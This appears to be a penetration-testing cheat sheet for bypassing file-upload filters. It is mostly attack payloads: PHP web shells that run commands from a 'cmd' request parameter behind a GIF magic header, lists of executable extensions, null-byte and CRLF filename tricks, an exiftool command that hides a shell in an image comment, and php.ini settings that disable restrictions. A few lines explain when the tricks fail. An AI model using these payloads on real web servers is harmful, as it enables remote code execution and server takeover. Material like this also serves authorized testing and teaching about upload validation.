GIF89a1
<? php $a = system ( $_GET[ 'cmd' ] ) ; echo $a; ?>
<? php system ( 'whoami' ) ; ?>
<? php exec ( 'whoami' ) ; ?>
<? php passthru ( 'whoami' ) ; ?>
<? php shell_exec ( 'whoami' ) ; ?>
<? php if ( isset ( $_REQUEST[ 'cmd' ] ) ){ echo "<pre>" ; $cmd = ($_REQUEST[ 'cmd' ]); system ( $cmd ) ; echo "</pre>" ; die ; } ?>
<? php preg_replace ( '/. * /e' , 'system("whoami");' , '' ) ; ?>
evil . png; . php
evil . gif . php
evil . gif . php5
evil . php;gif
evil . config
evil . htaccess
-- other - extensions --
php3
php4
php5
php7
pht
phtm
phtml
phar
phps
PHP: . php , . php2 , . php3 , . php4 , . php5 , . php6 , . php7 , . phps , . phps , . pht , . phtm , . phtml , . pgif , . shtml , . htaccess , . phar , . inc
ASP: . asp , . aspx , . config , . ashx , . asmx , . aspq , . axd , . cshtm , . cshtml , . rem , . soap , . vbhtm , . vbhtml , . asa , . cer , . shtml
Jsp: . jsp , . jspx , . jsw , . jsv , . jspf , . wss , . do , . action
Coldfusion: . cfm , . cfml , . cfc , . dbm
Flash: . swf
Perl: . pl , . cgi
Erlang Yaws Web Server: . yaws
Bypass file extension checks
file . php % 20
file . php % 0 a
file . php % 00
file . php % 0 d % 0 a
file . php /
file . php . \
file .
file . php ... .
file . pHp5 ... .
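- Try to bypass the protections by tricking the server-side extension parser with techniques like doubling the extension or adding junk data (null bytes) between extensions. These tricks succeed only when the validation step and the code that stores or serves the file parse the name differently, so an upload handler that discards the client-supplied name and assigns its own name with an allowlisted extension is not affected by them.
file . png . php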
file . png . pHp5
file . php % 00 . png
file . php\x00 . png
file . php % 0 a . png
file . php % 0 d % 0 a . png
flile . phpJunk123png
Copy exiftool - Comment = '<?php system($_REQUEST[' cmd ']); ?>' test . png
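php.ini file to bypass restrictions (takes effect only if the server loads a php.ini from the upload directory, as some CGI-style setups do; safe_mode and safe_mode_gid were removed in PHP 5.4, and exec / shell_exec are not php.ini directives)
safe_mode = Off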
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
exec = ON
shell_exec = ON